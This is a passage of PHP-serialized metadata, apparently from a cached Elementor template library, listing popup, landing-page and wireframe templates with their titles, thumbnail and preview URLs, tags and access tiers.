Agency\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:149;a:21:{s:4:\"tmpl\";i:1272;s:2:\"id\";i:22331;s:5:\"title\";s:36:\"Fly-In | CTA | Dog Cat Food Delivery\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/dog-cat-food-delivery-5.jpg\";s:12:\"tmpl_created\";i:1647341069;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-cta-popup-dog-cat-food-delivery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Delivery Service\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:150;a:21:{s:4:\"tmpl\";i:1273;s:2:\"id\";i:22337;s:5:\"title\";s:37:\"Full Screen | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-12.jpg\";s:12:\"tmpl_created\";i:1647341370;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-contact-popup-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:151;a:21:{s:4:\"tmpl\";i:1274;s:2:\"id\";i:22343;s:5:\"title\";s:44:\"Classic | Contact | Support Product Platform\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/03/support-13.jpg\";s:12:\"tmpl_created\";i:1647341972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-contact-support-product-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Contact\",\"Support\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:152;a:21:{s:4:\"tmpl\";i:1275;s:2:\"id\";i:22371;s:5:\"title\";s:38:\"Full Screen | Contact | Small Business\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/small-business-14.jpg\";s:12:\"tmpl_created\";i:1647342508;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-contact-small-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:40:\"[\"Business\",\"Contact\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:153;a:21:{s:4:\"tmpl\";i:1276;s:2:\"id\";i:22377;s:5:\"title\";s:31:\"Classic | Contact | Online Shop\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/online-shop-15.jpg\";s:12:\"tmpl_created\";i:1647352786;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-online-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:154;a:21:{s:4:\"tmpl\";i:1277;s:2:\"id\";i:22383;s:5:\"title\";s:40:\"Classic | Booking | Children Optometrist\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/children-optometrist-16.jpg\";s:12:\"tmpl_created\";i:1647352963;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-booking-children-optometrist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:53:\"[\"Booking\",\"Business\",\"Contact\",\"Education\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:155;a:21:{s:4:\"tmpl\";i:1278;s:2:\"id\";i:22389;s:5:\"title\";s:28:\"Fly-In | Contact | Open Week\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/03/open-week17.jpg\";s:12:\"tmpl_created\";i:1647353281;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-open-week/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:34:\"[\"Business\",\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:156;a:21:{s:4:\"tmpl\";i:1279;s:2:\"id\";i:22397;s:5:\"title\";s:43:\"Full Screen | CTA | Plant Pots Online Store\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/plant-pots-online-store-18.jpg\";s:12:\"tmpl_created\";i:1647353429;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-cta-plant-pots-online-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:33:\"[\"Ecommerce\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:157;a:21:{s:4:\"tmpl\";i:1054;s:2:\"id\";i:15414;s:5:\"title\";s:32:\"Classic | Contact | Dance Studio\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/PopUp.jpg\";s:12:\"tmpl_created\";i:1603180596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-dance-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:762;s:11:\"trend_index\";i:650;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:158;a:21:{s:4:\"tmpl\";i:1398;s:2:\"id\";i:23687;s:5:\"title\";s:32:\"Pizza Promotion – Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/48-Pizza-Promotion.jpg\";s:12:\"tmpl_created\";i:1649670575;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/pizza-promotion-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:92:\"[\"Business\",\"Cooking\",\"Delivery\",\"Discount\",\"Fast Food\",\"Food\",\"Landing Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:159;a:21:{s:4:\"tmpl\";i:1400;s:2:\"id\";i:23751;s:5:\"title\";s:33:\"Baby Sleep Webinar – Events\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/63-Baby-Sleep-Webinar.jpg\";s:12:\"tmpl_created\";i:1649676065;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/baby-sleep-webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:227:\"[\"Baby\",\"Booking\",\"Business\",\"Children\",\"Course Online\",\"Education\",\"Events\",\"Health\",\"Landing Pages\",\"Life Coach\",\"Lifestyle\",\"Online Event\",\"Online Service\",\"Parenting\",\"Professional\",\"Remote\",\"Services\",\"Training\",\"Webinar\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:160;a:21:{s:4:\"tmpl\";i:1401;s:2:\"id\";i:23776;s:5:\"title\";s:34:\"Ski Hotel Promotion – Travel\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/04/64-Ski-Hotel-Promotion.jpg\";s:12:\"tmpl_created\";i:1649691720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/ski-hotel-promotion-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Travel\";s:4:\"tags\";s:118:\"[\"Accommodation\",\"Booking\",\"Discount. Landing Pages\",\"Lifestyle\",\"Luxury\",\"Services\",\"Spa\",\"Travel\",\"Trip\",\"Vacation\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:161;a:21:{s:4:\"tmpl\";i:1402;s:2:\"id\";i:23804;s:5:\"title\";s:30:\"Cake Delivery – Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/04/67-Cake-Delivery.jpg\";s:12:\"tmpl_created\";i:1649692909;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/cake-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:101:\"[\"Bakery\",\"Business\",\"Cake\",\"Cooking\",\"Delivery\",\"Discount\",\"Food\",\"Landing Pages\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:162;a:21:{s:4:\"tmpl\";i:1403;s:2:\"id\";i:23832;s:5:\"title\";s:32:\"Furniture Store – Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/87-Furniture-Store.jpg\";s:12:\"tmpl_created\";i:1649694812;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/furniture-store-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:232:\"[\"Architecture\",\"Art\",\"Business\",\"Construction\",\"Coupon\",\"Creative\",\"Decor\",\"Designer\",\"Discount\",\"Fashion\",\"Furniture Design\",\"Home\",\"House\",\"Interior Design\",\"Landing Pages\",\"Lifestyle\",\"Products\",\"Professional\",\"Services\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:163;a:21:{s:4:\"tmpl\";i:1404;s:2:\"id\";i:23746;s:5:\"title\";s:22:\"Nails – Business\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/04/62-Nails-1.jpg\";s:12:\"tmpl_created\";i:1649704635;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/nails-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:173:\"[\"Art\",\"Beauty\",\"Business\",\"Colorful\",\"Cosmetics\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Girly\",\"Landing Pages\",\"Lifestyle\",\"Manicure\",\"Modern\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:164;a:21:{s:4:\"tmpl\";i:1405;s:2:\"id\";i:23846;s:5:\"title\";s:29:\"Music Festival – Events\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/04/88-Music-Festival.jpg\";s:12:\"tmpl_created\";i:1649707763;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/music-festival-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:128:\"[\"Author\",\"Booking\",\"Business\",\"Creative\",\"Discount\",\"Events\",\"Landing Pages\",\"Music\",\"Online\",\"Online Event\",\"Party\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:165;a:21:{s:4:\"tmpl\";i:1406;s:2:\"id\";i:23872;s:5:\"title\";s:40:\"Fashion Styling Course – Education\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/89-Fashion-Styling-Course.jpg\";s:12:\"tmpl_created\";i:1649708569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/fashion-styling-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:173:\"[\"Aesthetic\",\"Art\",\"Beauty\",\"Business\",\"Course Online\",\"Creative\",\"Discount\",\"Education\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Online\",\"Online Service\",\"Stylist\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:166;a:21:{s:4:\"tmpl\";i:1407;s:2:\"id\";i:23897;s:5:\"title\";s:33:\"Bags Online Shop – Business\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/04/90-Bags-Online-Shop.jpg\";s:12:\"tmpl_created\";i:1649709513;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/bags-online-shop-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:170:\"[\"Art\",\"Bag\",\"Business\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Luxury\",\"Modern\",\"Online\",\"Online Shop\",\"Products\",\"Sales\",\"Shop\",\"Stylist\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:167;a:21:{s:4:\"tmpl\";i:1408;s:2:\"id\";i:23932;s:5:\"title\";s:32:\"Cooking Academy – Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/91-Cooking-Academy.jpg\";s:12:\"tmpl_created\";i:1649710216;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/cooking-academy-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:145:\"[\"Academy\",\"Booking\",\"Business\",\"Chef\",\"Cooking\",\"Education\",\"Food\",\"Free Trial\",\"Landing Pages\",\"Professional\",\"School\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:168;a:21:{s:4:\"tmpl\";i:1409;s:2:\"id\";i:23970;s:5:\"title\";s:45:\"Ophthalmology Medical Clinic – Business\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/04/92-Ophthalmology-Medical-Clinic.jpg\";s:12:\"tmpl_created\";i:1649711096;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/ophthalmology-medical-clinic-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:165:\"[\"About\",\"Business\",\"Care\",\"Consulting\",\"Eye\",\"Free Trial\",\"Glasses\",\"Health\",\"Landing Pages\",\"Lifestyle\",\"Medical\",\"Modern\",\"Optometrist\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:169;a:21:{s:4:\"tmpl\";i:1425;s:2:\"id\";i:24331;s:5:\"title\";s:24:\"Wireframe – Home 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-1.jpg\";s:12:\"tmpl_created\";i:1653988363;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:170;a:21:{s:4:\"tmpl\";i:1218;s:2:\"id\";i:20792;s:5:\"title\";s:26:\"Luxury Car – Product\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/11/250x280-1.jpg\";s:12:\"tmpl_created\";i:1636903770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/lp/luxury-car-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:54:\"[\"car\",\"Ecommerce\",\"Landing Pages\",\"Luxury\",\"Product\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:171;a:21:{s:4:\"tmpl\";i:1428;s:2:\"id\";i:24398;s:5:\"title\";s:25:\"Wireframe – About 1\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-1.jpg\";s:12:\"tmpl_created\";i:1653988534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:83:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Professional\",\"Services\",\"Team\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:172;a:21:{s:4:\"tmpl\";i:991;s:2:\"id\";i:13413;s:5:\"title\";s:33:\"Classic | Contact | Online Course\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp-Help.jpg\";s:12:\"tmpl_created\";i:1587474761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-contact-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:530;s:11:\"trend_index\";i:369;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:173;a:21:{s:4:\"tmpl\";i:1053;s:2:\"id\";i:15272;s:5:\"title\";s:32:\"Classic | Contact | 